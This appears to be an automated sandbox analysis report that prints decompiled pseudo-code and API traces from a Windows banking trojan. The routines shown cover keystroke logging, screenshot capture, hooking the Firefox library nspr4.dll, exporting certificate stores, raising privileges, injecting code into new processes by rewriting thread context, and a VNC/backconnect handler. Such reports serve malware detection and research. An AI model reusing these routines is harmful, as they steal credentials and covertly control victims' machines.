    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: Desktop$StationWindow$Thread$CloseCreateOpen$CurrentProcess
    • String ID:
    • API String ID: 2917431391-0
    • Opcode ID: afaf32fb5f6055d3f23273ee38eec15e2a428bf5be9e2cf8a09f586e91da02a3
    • Instruction ID: e2f82abc2b0256a60be68959b120be1a606b52f3c5ab1152925077326097362d
    • Opcode Fuzzy Hash: afaf32fb5f6055d3f23273ee38eec15e2a428bf5be9e2cf8a09f586e91da02a3
    • Instruction Fuzzy Hash: 202180B5804258BFDF206FA59D8899F7F7CEF84345B04447AF905F3261D6388D458A68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E00405D60(MSG* _a4) {
    				char _v524;
    				char _v780;
    				char _v840;
    				char _v864;
    				short _v884;
    				intOrPtr* _v888;
    				intOrPtr _v900;
    				void* __edi;
    				void* __esi;
    				int _t25;
    				signed int _t27;
    				signed int _t32;
    				void* _t36;
    				intOrPtr _t39;
    				WCHAR* _t45;
    				MSG* _t54;
    				WCHAR* _t65;
    				intOrPtr* _t66;
    				signed int _t67;
    				void* _t69;
    
    				_t69 = (_t67 & 0xfffffff8) - 0x374;
    				_t54 = _a4;
    				if(_t54 == 0 || E0040EEE1() == 0) {
    					L20:
    					return TranslateMessage(_t54);
    				} else {
    					_t25 = _t54->message;
    					if(_t25 != 0x201) {
    						__eflags = _t25 - 0x100;
    						if(_t25 != 0x100) {
    							goto L20;
    						}
    						__eflags = _t54->wParam - 0x1b;
    						if(_t54->wParam == 0x1b) {
    							goto L20;
    						}
    						_t27 = GetKeyboardState( &_v780);
    						__eflags = _t27;
    						if(_t27 == 0) {
    							goto L20;
    						}
    						_t32 = ToUnicode(_t54->wParam, _t54->lParam & 0x000000ff,  &_v780,  &_v884, 9, 0);
    						__eflags = _t32;
    						if(_t32 <= 0) {
    							goto L20;
    						}
    						__eflags = _t32 - 1;
    						if(__eflags != 0) {
    							if(__eflags > 0) {
    								L18:
    								__eflags = 0;
    								 *((short*)(_t69 + 0x10 + _t32 * 2)) = 0;
    								_push( &_v884);
    								L19:
    								E00405BC3();
    								goto L20;
    							}
    							L17:
    							__eflags = _v884 - 0x20;
    							if(_v884 < 0x20) {
    								goto L20;
    							}
    							goto L18;
    						}
    						__eflags = _t54->wParam - 8;
    						if(_t54->wParam != 8) {
    							goto L17;
    						}
    						_push(0x401620);
    						goto L19;
    					}
    					EnterCriticalSection(0x4228a8);
    					if( *0x4228a0 > 0) {
    						 *0x4228a0 =  *0x4228a0 + 0xffff;
    						_t36 = 2;
    						E0040FA33(_t36,  &_v864);
    						_t39 = E00411779( &_v864, 0x1e, 0x1f4);
    						_v900 = _t39;
    						if(_t39 != 0) {
    							E0040FA33(0,  &_v840);
    							_t65 =  &_v884;
    							E0040FA33(1, _t65);
    							_t45 =  *0x422834; // 0x0
    							if(_t45 != 0) {
    								_t65 = _t45;
    							}
    							E0041709B( &_v840, 0x104,  &_v524,  &_v840);
    							_t66 = _v888;
    							E004058C2(0x104, _t66,  &_v524);
    							 *((intOrPtr*)( *_t66 + 8))(_t66, _t65,  *0x422e08, GetTickCount());
    						}
    					}
    					LeaveCriticalSection(0x4228a8);
    					goto L20;
    				}
    			}

    APIs
    • TranslateMessage.USER32(?), ref: 00405EB7
      • Part of subcall function 0040EEE1: WaitForSingleObject.KERNEL32(00000000,004162FC,00000318,00000000,00000318,909011A5,00000002), ref: 0040EEE9
    • EnterCriticalSection.KERNEL32(004228A8), ref: 00405D9A
    • LeaveCriticalSection.KERNEL32(004228A8), ref: 00405E3D
      • Part of subcall function 00411779: LoadLibraryA.KERNEL32(gdiplus.dll,?,?,?), ref: 004117AB
      • Part of subcall function 00411779: GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 004117BC
      • Part of subcall function 00411779: GetProcAddress.KERNEL32(000001F4,GdiplusShutdown), ref: 004117C9
      • Part of subcall function 00411779: GetProcAddress.KERNEL32(000001F4,GdipCreateBitmapFromHBITMAP), ref: 004117D6
      • Part of subcall function 00411779: GetProcAddress.KERNEL32(000001F4,GdipDisposeImage), ref: 004117E3
      • Part of subcall function 00411779: GetProcAddress.KERNEL32(000001F4,GdipGetImageEncodersSize), ref: 004117F0
      • Part of subcall function 00411779: GetProcAddress.KERNEL32(000001F4,GdipGetImageEncoders), ref: 004117FD
      • Part of subcall function 00411779: GetProcAddress.KERNEL32(000001F4,GdipSaveImageToStream), ref: 0041180A
      • Part of subcall function 00411779: LoadLibraryA.KERNEL32(ole32.dll,?,?,?), ref: 00411852
      • Part of subcall function 00411779: GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 0041185D
      • Part of subcall function 00411779: LoadLibraryA.KERNEL32(gdi32.dll,?,?,?), ref: 0041186F
      • Part of subcall function 00411779: GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 0041187A
      • Part of subcall function 00411779: GetProcAddress.KERNEL32(?,CreateCompatibleDC), ref: 00411886
      • Part of subcall function 00411779: GetProcAddress.KERNEL32(?,CreateCompatibleBitmap), ref: 00411893
      • Part of subcall function 00411779: GetProcAddress.KERNEL32(?,GetDeviceCaps), ref: 004118A0
      • Part of subcall function 00411779: GetProcAddress.KERNEL32(?,SelectObject), ref: 004118AD
      • Part of subcall function 00411779: GetProcAddress.KERNEL32(?,BitBlt), ref: 004118BA
      • Part of subcall function 00411779: GetProcAddress.KERNEL32(?,DeleteObject), ref: 004118C7
    • GetTickCount.KERNEL32 ref: 00405DFF
    • GetKeyboardState.USER32(?), ref: 00405E57
    • ToUnicode.USER32 ref: 00405E7F
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: AddressProc$LibraryLoad$CriticalSection$CountEnterKeyboardLeaveMessageObjectSingleStateTickTranslateUnicodeWait
    • String ID:
    • API String ID: 2762424063-3916222277
    • Opcode ID: 6e81bc6ae7d7701d116d56c491785d57f76aca2d1d9e471e081d89ebc407246f
    • Instruction ID: d490220980ad6ed93fe595966bcf8ebf79417177323edd108bf136aeb4d3499b
    • Opcode Fuzzy Hash: 6e81bc6ae7d7701d116d56c491785d57f76aca2d1d9e471e081d89ebc407246f
    • Instruction Fuzzy Hash: A431BE32604701ABDB20EB64DD49A9B77A8EF04310F44483BF994F61E1DB78DA458BA9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E00415E14(WCHAR* _a4, long _a8, UNICODE_STRING* _a12, HMODULE* _a16) {
    				void* __edi;
    				void* _t12;
    				long _t13;
    				void* _t16;
    				void* _t17;
    				void* _t21;
    				void* _t22;
    				void* _t23;
    				UNICODE_STRING* _t24;
    				void* _t28;
    				HMODULE* _t29;
    				struct _OBJDIR_INFORMATION _t31;
    
    				if(E0040EEE1() != 0) {
    					_t29 = _a16;
    					_t24 = _a12;
    					_t12 =  *0x422bcc(_a4, 0, _t24, _t29, _t23, _t28, _t17);
    					_t13 = LdrLoadDll(_a4, _a8, _t24, _t29);
    					_a4 = _t13;
    					if(_t12 < 0 && _t13 >= 0 && _t29 != 0 &&  *_t29 != 0 && _t24 != 0) {
    						EnterCriticalSection(0x4231ac);
    						if(( *0x423144 & 0x00000001) == 0) {
    							_t31 =  *_t29;
    							if(lstrcmpiW( *(_t24 + 4), L"nspr4.dll") != 0) {
    								_t16 = 0;
    							} else {
    								_t16 = E004159B8(_t21, _t22, _t31);
    							}
    							if(_t16 != 0) {
    								 *0x423144 =  *0x423144 | 0x00000001;
    							}
    						}
    						LeaveCriticalSection(0x4231ac);
    					}
    					return _a4;
    				}
    				goto ( *0x422bc8);
    			}

    APIs
      • Part of subcall function 0040EEE1: WaitForSingleObject.KERNEL32(00000000,004162FC,00000318,00000000,00000318,909011A5,00000002), ref: 0040EEE9
    • LdrGetDllHandle.NTDLL(?,00000000,?,?), ref: 00415E37
    • LdrLoadDll.NTDLL(?,?,?,?), ref: 00415E47
    • EnterCriticalSection.KERNEL32(004231AC), ref: 00415E6B
    • lstrcmpiW.KERNEL32(?,nspr4.dll), ref: 00415E85
    • LeaveCriticalSection.KERNEL32(004231AC), ref: 00415EA6
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: CriticalSection$EnterHandleLeaveLoadObjectSingleWaitlstrcmpi
    • String ID: @xw$nspr4.dll
    • API String ID: 2984399785-1669710511
    • Opcode ID: 719a63a365665ee137ea2d677e3992c5865579bdddd7ec27bb5fb93580bd2e6f
    • Instruction ID: c701a48caa768924cfcababe9648c27c944c0d08995dc24eb32be2479b5a1681
    • Opcode Fuzzy Hash: 719a63a365665ee137ea2d677e3992c5865579bdddd7ec27bb5fb93580bd2e6f
    • Instruction Fuzzy Hash: FF115E31600714EBDF215F21ED44BEB7B68EF85755F04402AFD08A7261C779EAA1CAAC
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • CertOpenSystemStoreW.CRYPT32(00000000,00404B84), ref: 0041D60C
    • CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 0041D628
    • CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 0041D634
    • PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004), ref: 0041D673
    • PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004), ref: 0041D6A3
    • CharLowerW.USER32(?,?,00000000,00000001), ref: 0041D6C1
    • GetSystemTime.KERNEL32(?,?,?,00000000,00000001), ref: 0041D6CC
    • CertCloseStore.CRYPT32(?,00000000), ref: 0041D755
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: CertStore$CertificatesEnumExportSystem$CharCloseLowerOpenTime
    • String ID:
    • API String ID: 3751268071-0
    • Opcode ID: a9205bfa33ef882c3b560dd41546a9960b1fab9baf124496d2f64d7cfa1a5d46
    • Instruction ID: 62c3b1b4f8da8e5576372c0920d59ecb87bfd3b6922c567e92ebeb561ac8e865
    • Opcode Fuzzy Hash: a9205bfa33ef882c3b560dd41546a9960b1fab9baf124496d2f64d7cfa1a5d46
    • Instruction Fuzzy Hash: FF419AB1508345ABD7119F55CD40AAFBBECAB84714F00093FFA98E2191D634D985C766
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 89%
    			E0041BAD3(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, signed char _a8, intOrPtr _a12, intOrPtr _a16, void* _a20, long _a24, long _a28) {
    				short _v524;
    				struct _WIN32_FIND_DATAW _v1116;
    				intOrPtr _v1120;
    				intOrPtr _v1124;
    				void* _v1128;
    				int _t51;
    				signed int _t60;
    				long _t68;
    				signed char _t71;
    				signed int _t83;
    
    				_v1120 = __edx;
    				_v1124 = __ecx;
    				_t51 = E0041BC2F("*",  &_v524, __ecx);
    				if(_t51 == 0) {
    					L25:
    					return _t51;
    				}
    				_t51 = FindFirstFileW( &_v524,  &_v1116);
    				_v1128 = _t51;
    				if(_t51 != 0xffffffff) {
    					_t71 = _a8;
    					while(1) {
    						_t83 = 0;
    						if(_a20 != 0 && WaitForSingleObject(_a20, 0) != 0x102) {
    							break;
    						}
    						if(E0041B834( &(_v1116.cFileName)) != 0) {
    							L23:
    							if(FindNextFileW(_v1128,  &_v1116) != 0) {
    								continue;
    							}
    							break;
    						}
    						_t60 = _v1116.dwFileAttributes & 0x00000010;
    						if(_t60 == 0 || (_t71 & 0x00000002) == 0) {
    							if(_t60 != _t83 || (_t71 & 0x00000004) == 0) {
    								goto L17;
    							} else {
    								goto L10;
    							}
    						} else {
    							L10:
    							if(_a4 <= _t83) {
    								L17:
    								if((_v1116.dwFileAttributes & 0x00000010) != 0 && (_t71 & 0x00000001) != 0 && E0041BC2F( &(_v1116.cFileName),  &_v524, _v1124) != 0) {
    									_t103 = _a24;
    									if(_a24 != 0) {
    										Sleep(_a24);
    									}
    									E0041BAD3( &_v524, _v1120, _t103, _a4, _t71, _a12, _a16, _a20, _a24, _a28);
    								}
    								goto L23;
    							}
    							while(PathMatchSpecW( &(_v1116.cFileName),  *(_v1120 + _t83 * 4)) == 0) {
    								_t83 = _t83 + 1;
    								if(_t83 < _a4) {
    									continue;
    								}
    								goto L17;
    							}
    							_t68 = _a12(_a16);
    							__eflags = _t68;
    							if(_t68 == 0) {
    								break;
    							}
    							__eflags = _a28;
    							if(_a28 != 0) {
    								Sleep(_a28);
    							}
    							goto L17;
    						}
    					}
    					_t51 = FindClose(_v1128);
    				}
    			}













    0x0041baf0
    0x0041baf4
    0x0041baf8
    0x0041baff
    0x0041bc26
    0x0041bc2c
    0x0041bc2c
    0x0041bb12
    0x0041bb18
    0x0041bb1f
    0x0041bb25
    0x0041bb2e
    0x0041bb2e
    0x0041bb33
    0x00000000
    0x00000000
    0x0041bb55
    0x0041bc05
    0x0041bc16
    0x00000000
    0x00000000
    0x00000000
    0x0041bc16
    0x0041bb5f
    0x0041bb62
    0x0041bb6b
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0041bb72
    0x0041bb72
    0x0041bb75
    0x0041bbb2
    0x0041bbb7
    0x0041bbd7
    0x0041bbdb
    0x0041bbe0
    0x0041bbe0
    0x0041bc00
    0x0041bc00
    0x00000000
    0x0041bbb7
    0x0041bb77
    0x0041bb8d
    0x0041bb91
    0x00000000
    0x00000000
    0x00000000
    0x0041bb93
    0x0041bba0
    0x0041bba3
    0x0041bba5
    0x00000000
    0x00000000
    0x0041bba7
    0x0041bbab
    0x0041bbb0
    0x0041bbb0
    0x00000000
    0x0041bbab
    0x0041bb62
    0x0041bc20
    0x0041bc20

    APIs
      • Part of subcall function 0041BC2F: PathCombineW.SHLWAPI(0040E807,0040E807,?,0040E807,?,?), ref: 0041BC4E
    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0041BB12
    • WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0041BB39
    • PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0041BB83
    • Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 0041BBB0
    • Sleep.KERNEL32(00000000,?,?), ref: 0041BBE0
    • FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0041BC0E
    • FindClose.KERNEL32(?,?,?,?,00000000), ref: 0041BC20
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: Find$FilePathSleep$CloseCombineFirstMatchNextObjectSingleSpecWait
    • String ID:
    • API String ID: 2348139788-0
    • Opcode ID: df86d6d66e581e59a2c0f1926b8253b7cbd4eb2174fce9e08a484130d2ae7d0c
    • Instruction ID: b80c358cf10a3b6234cd0841c56f7429f1e6e3f092ebd59e69b9d4d14f4816b3
    • Opcode Fuzzy Hash: df86d6d66e581e59a2c0f1926b8253b7cbd4eb2174fce9e08a484130d2ae7d0c
    • Instruction Fuzzy Hash: C4415E3100820A9BCF21DF14CD48AEF7BA5FF44344F10492AF995926A1E739D9D9CBDA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00417A74(WCHAR* _a4) {
    				void* _v12;
    				intOrPtr _v16;
    				struct _TOKEN_PRIVILEGES _v28;
    				int _t23;
    
    				_t23 = 0;
    				if(OpenThreadToken(GetCurrentThread(), 0x20, 0,  &_v12) != 0 || OpenProcessToken(0xffffffff, 0x20,  &_v12) != 0) {
    					_v28.PrivilegeCount = 1;
    					_v16 = 2;
    					if(LookupPrivilegeValueW(_t23, _a4,  &(_v28.Privileges)) != 0 && AdjustTokenPrivileges(_v12, _t23,  &_v28, _t23, _t23, _t23) != 0 && GetLastError() == 0) {
    						_t23 = 1;
    					}
    					CloseHandle(_v12);
    					return _t23;
    				} else {
    					return 0;
    				}
    			}







    0x00417a7f
    0x00417a93
    0x00417ab2
    0x00417aba
    0x00417ac9
    0x00417aea
    0x00417aea
    0x00417aef
    0x00000000
    0x00417aa7
    0x00000000
    0x00417aa7

    APIs
    • GetCurrentThread.KERNEL32 ref: 00417A84
    • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,00408F58,SeTcbPrivilege), ref: 00417A8B
    • OpenProcessToken.ADVAPI32(000000FF,00000020,00408F58,?,?,?,?,00408F58,SeTcbPrivilege), ref: 00417A9D
    • LookupPrivilegeValueW.ADVAPI32(00000000,00408F58,?), ref: 00417AC1
    • AdjustTokenPrivileges.ADVAPI32(00408F58,00000000,00000001,00000000,00000000,00000000), ref: 00417AD6
    • GetLastError.KERNEL32 ref: 00417AE0
    • CloseHandle.KERNEL32(00408F58), ref: 00417AEF
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: Token$OpenThread$AdjustCloseCurrentErrorHandleLastLookupPrivilegePrivilegesProcessValue
    • String ID:
    • API String ID: 2724707430-0
    • Opcode ID: a6c8dbe12b51af1182475902ce92d802dfcf34907721043a860339e9293bd7b0
    • Instruction ID: 356259359bbfac2e2ecbcc8256f049f907c66e15c834a8f5fd79b38554ae7f18
    • Opcode Fuzzy Hash: a6c8dbe12b51af1182475902ce92d802dfcf34907721043a860339e9293bd7b0
    • Instruction Fuzzy Hash: 8F010C71604208BFEF009FA19D89EEF7BBCEF04384F004166F501E21A0E7748A858A69
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 86%
    			E00415CE5(void* __edx, void** _a4, void** _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, signed char _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44) {
    				struct _CONTEXT _v776;
    				void* _v780;
    				intOrPtr _v784;
    				void* __edi;
    				void* __esi;
    				long _t32;
    				intOrPtr _t36;
    				void* _t37;
    				void* _t45;
    				void** _t46;
    				void* _t48;
    				void* _t49;
    				void* _t50;
    				void** _t53;
    				void* _t54;
    				void* _t56;
    				signed int _t58;
    				void* _t70;
    
    				_t49 = __edx;
    				_t46 = _a4;
    				_t32 =  *0x422bbc(_t46, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _t50, _t54, _t45);
    				_v776.ContextFlags = _t32;
    				if(_t32 >= 0 && (_a32 & 0x00000001) != 0 && _t46 != 0 && _a8 != 0 && E0040EEE1() != 0 && GetProcessId( *_t46) != 0) {
    					_t36 = E0040ED0F(_t48, _t49, _t35);
    					_v784 = _t36;
    					_t68 = _t36;
    					if(_t36 != 0) {
    						_t37 = E0040EDF6(_t48,  *_t46, _t54, _t68, _t36, 0);
    						_t53 = _a8;
    						_t56 = _t37;
    						_v780 = _t56;
    						_t58 = _t56 -  *0x422bac + E0040F574;
    						_v776.ContextFlags = 0x10003;
    						if(GetThreadContext( *_t53,  &_v776) == 0) {
    							L12:
    							VirtualFreeEx( *_t46, _v776.Dr0, 0, 0x8000);
    						} else {
    							_t70 = _v776.EFlags -  *0x422bc4; // 0x77e5ba60
    							if(_t70 != 0) {
    								goto L12;
    							} else {
    								if(( *0x422b98 & 0x00000010) != 0) {
    									_t58 = _t58 ^ _v776.Eip;
    								}
    								_v776.Eip = _t58;
    								_v776.Dr1.ContextFlags = 0x10002;
    								if(SetThreadContext( *_t53,  &(_v776.Dr1)) == 0) {
    									goto L12;
    								}
    							}
    						}
    						CloseHandle(_v780);
    					}
    				}
    				return _v776.ContextFlags;
    			}





















    0x00415ce5
    0x00415cf7
    0x00415d16
    0x00415d1c
    0x00415d22
    0x00415d62
    0x00415d67
    0x00415d6b
    0x00415d6d
    0x00415d78
    0x00415d7d
    0x00415d80
    0x00415d86
    0x00415d93
    0x00415d99
    0x00415da9
    0x00415dea
    0x00415df7
    0x00415dab
    0x00415db2
    0x00415db8
    0x00000000
    0x00415dba
    0x00415dc1
    0x00415dc3
    0x00415dc3
    0x00415dd1
    0x00415dd8
    0x00415de8
    0x00000000
    0x00000000
    0x00415de8
    0x00415db8
    0x00415e01
    0x00415e01
    0x00415d6d
    0x00415e11

    APIs
    • NtCreateUserProcess.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00415D16
      • Part of subcall function 0040EEE1: WaitForSingleObject.KERNEL32(00000000,004162FC,00000318,00000000,00000318,909011A5,00000002), ref: 0040EEE9
    • GetProcessId.KERNEL32(?), ref: 00415D53
      • Part of subcall function 0040ED0F: CreateMutexW.KERNEL32(00422BD0,00000001,?,00422E10,74B5F560,?,00000002,?,74B5F560), ref: 0040ED57
      • Part of subcall function 0040ED0F: GetLastError.KERNEL32 ref: 0040ED63
      • Part of subcall function 0040ED0F: CloseHandle.KERNEL32(00000000), ref: 0040ED71
    • GetThreadContext.KERNEL32 ref: 00415DA1
    • SetThreadContext.KERNEL32(00000000,00000000), ref: 00415DE0
    • VirtualFreeEx.KERNEL32(?,00000000,00000000,00008000), ref: 00415DF7
    • CloseHandle.KERNEL32(?), ref: 00415E01
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: CloseContextCreateHandleProcessThread$ErrorFreeLastMutexObjectSingleUserVirtualWait
    • String ID:
    • API String ID: 1044471028-0
    • Opcode ID: 18ce88f1e46a8753f04d367e3a07ffd249dddddf39a2bac27017ce3db60d49e8
    • Instruction ID: 182a28668fdaf9cec88f6625dcde32d198843b3673ed66d45ef1297c3adb834d
    • Opcode Fuzzy Hash: 18ce88f1e46a8753f04d367e3a07ffd249dddddf39a2bac27017ce3db60d49e8
    • Instruction Fuzzy Hash: C7319C31600306EBCB218F50DD08BDB7BA9FF88354F04852AFD44A22A0C775D9A4DF99
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • CryptAcquireContextW.ADVAPI32(0041BC76,00000000,00000000,00000001,F0000040,00000000,0041BC76,?,00000030,?,?,?,0041C18F,?), ref: 00417666
    • CryptCreateHash.ADVAPI32(00008003,00008003,00000000,00000000,?,?,?,0041C18F,?), ref: 0041767E
    • CryptHashData.ADVAPI32(?,00000010), ref: 0041769A
    • CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000), ref: 004176B2
    • CryptDestroyHash.ADVAPI32(?), ref: 004176C9
    • CryptReleaseContext.ADVAPI32(?,00000000,?,?,0041C18F,?), ref: 004176D3
    Memory Dump Source
    • Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp
    • Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp
    • Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp
    Similarity
    • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamRelease
    • String ID:
    • API String ID: 3186506766-0
    • Opcode ID: 3835dfc47da88fbb4b0aff3b662bcb981bcd3fbea2fbc8bd214e1f0a9aaea509
    • Instruction ID: 376e00ff1d7d2ae177ae3805b162e4706f3c2ae8251cb659aee294adaf4f7081
    • Opcode Fuzzy Hash: 3835dfc47da88fbb4b0aff3b662bcb981bcd3fbea2fbc8bd214e1f0a9aaea509
    • Instruction Fuzzy Hash: 35111275804248BFEF129BA4DD88EEE7F3DEB04350F008462F551B01B1C2369E949B28
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 72%
    			E0040DB94(void* __ecx, CHAR** _a4, signed int _a7) {
    				signed int _v6;
    				signed int _v8;
    				char _v9;
    				signed int _v16;
    				signed int _v20;
    				signed int _v24;
    				char _v28;
    				short _v30;
    				intOrPtr _v36;
    				char _v44;
    				char _v304;
    				char _v788;
    				char _v792;
    				void* __edi;
    				void* __esi;
    				int _t68;
    				signed short _t70;
    				signed int _t80;
    				void* _t95;
    				signed int _t99;
    				void* _t102;
    				signed int _t108;
    				void* _t112;
    				CHAR** _t121;
    				signed int _t130;
    				intOrPtr* _t131;
    				intOrPtr* _t138;
    				signed int _t139;
    				void* _t141;
    
    				_t123 = __ecx;
    				E0041645B( &_v304,  &_v304, 0, 0x104);
    				_t121 = _a4;
    				if(lstrcmpiA( *_t121, ?str?) != 0) {
    					_t68 = lstrcmpiA( *_t121, "vnc");
    					__eflags = _t68;
    					if(_t68 != 0) {
    						_t70 = E00416A27( *_t121, _t123, 0);
    						_t6 = _t70 - 1; // -1
    						_t123 = _t6;
    						__eflags = _t6 - 0xfffd;
    						if(_t6 > 0xfffd) {
    							L32:
    							E0041A4A9( &_v304);
    							_a7 = 0;
    							if(_v304 <= 0) {
    								L34:
    								E004163A8( *_t121);
    								E004163A8(_t121[1]);
    								E004163A8(_t121[2]);
    								E00419B7B(_t121[3]);
    								E004163A8(_t121);
    								return 0;
    							} else {
    								goto L33;
    							}
    							do {
    								L33:
    								CloseHandle( *(_t141 + (_a7 & 0x000000ff) * 4 - 0x128));
    								_a7 = _a7 + 1;
    							} while (_a7 < _v304);
    							goto L34;
    						}
    						_t80 = _t70 & 0x0000ffff;
    						_v24 = _t80;
    						__eflags = _t80;
    						if(_t80 == 0) {
    							goto L32;
    						}
    						L6:
    						_t130 = E00419431(E00416A27(_t121[2], _t123, 0), _t123, _t121[1]);
    						_v16 = _t130;
    						if(_t130 == 0xffffffff) {
    							goto L32;
    						}
    						E004197A3(_t123, _t130);
    						E00419761(_t130);
    						_t89 = E004171FF(E0040F087(_t123,  &_v792) | 0xffffffff,  &_v788,  &_v44);
    						_t144 = _t89;
    						if(_t89 == 0) {
    							L31:
    							E0041974B(_t89, _t130);
    							goto L32;
    						}
    						_v9 = E0041CA42( &_v788, _v36, _t144, _t130, 1, _v44);
    						_t89 = E004171ED( &_v44);
    						if(_v9 == 0) {
    							goto L31;
    						}
    						_t89 = E00419658(0,  &_v16, 0, 0);
    						_t130 = _v16;
    						if(_t89 != _t130) {
    							goto L31;
    						}
    						while(1) {
    							_push(0x7530);
    							_push( &_v8);
    							_t95 = 4;
    							if(E0041935B(_t95, _t130) == 0 || _v8 <= 4) {
    								break;
    							}
    							_t138 = E00416378(_v8 & 0x0000ffff);
    							_push(0x7530);
    							if(_t138 == 0) {
    								_t127 = _v8 & 0x0000ffff;
    								_t99 = (_v6 & 0x0000ffff) + (_v8 & 0x0000ffff) - 4;
    								L29:
    								_push(_t99);
    								_push(_t130);
    								_t89 = E004193A3(_t127);
    								break;
    							}
    							_push(_t138);
    							_t127 = _t130;
    							_t102 = E0041935B((_v8 & 0x0000ffff) - 4, _t130);
    							_push(_t138);
    							if(_t102 == 0) {
    								L35:
    								_t89 = E004163A8();
    								break;
    							}
    							_v30 = _v6;
    							_v28 =  *_t138;
    							E004163A8();
    							if(_v6 != 0) {
    								_t139 = E00416378(_v6 & 0x0000ffff);
    								_t99 = _v6 & 0x0000ffff;
    								_push(0x7530);
    								__eflags = _t139;
    								if(_t139 == 0) {
    									goto L29;
    								}
    								_push(_t139);
    								_t127 = _t130;
    								_t108 = E0041935B(_t99, _t130);
    								__eflags = _t108;
    								if(_t108 == 0) {
    									_push(_t139);
    									goto L35;
    								}
    								_v20 = _t139;
    								L20:
    								if(_v28 == 2 && _v30 == 4) {
    									_t112 = 0xc;
    									_t131 = E00416378(_t112);
    									if(_t131 != 0) {
    										 *_t131 = _a4;
    										 *((intOrPtr*)(_t131 + 4)) = _v24;
    										 *((intOrPtr*)(_t131 + 8)) =  *_v20;
    										if(E0041A464( &_v304, 0x20000, E0040D90B, _t131) == 0) {
    											E004163A8(_t131);
    										}
    									}
    									E0041A412(_t127,  &_v304);
    								}
    								E004163A8(_v20);
    								_t89 = E00419658(0,  &_v16, 0, 0);
    								_t130 = _v16;
    								if(_t89 == _t130) {
    									continue;
    								} else {
    									break;
    								}
    							}
    							_v20 = _v20 & 0x00000000;
    							goto L20;
    						}
    						_t121 = _a4;
    						goto L31;
    					}
    					_v24 = 0xfffffffe;
    					goto L6;
    				}
    				_v24 = _v24 | 0xffffffff;
    				goto L6;
    			}
































    0x0040db94
    0x0040dbae
    0x0040dbb3
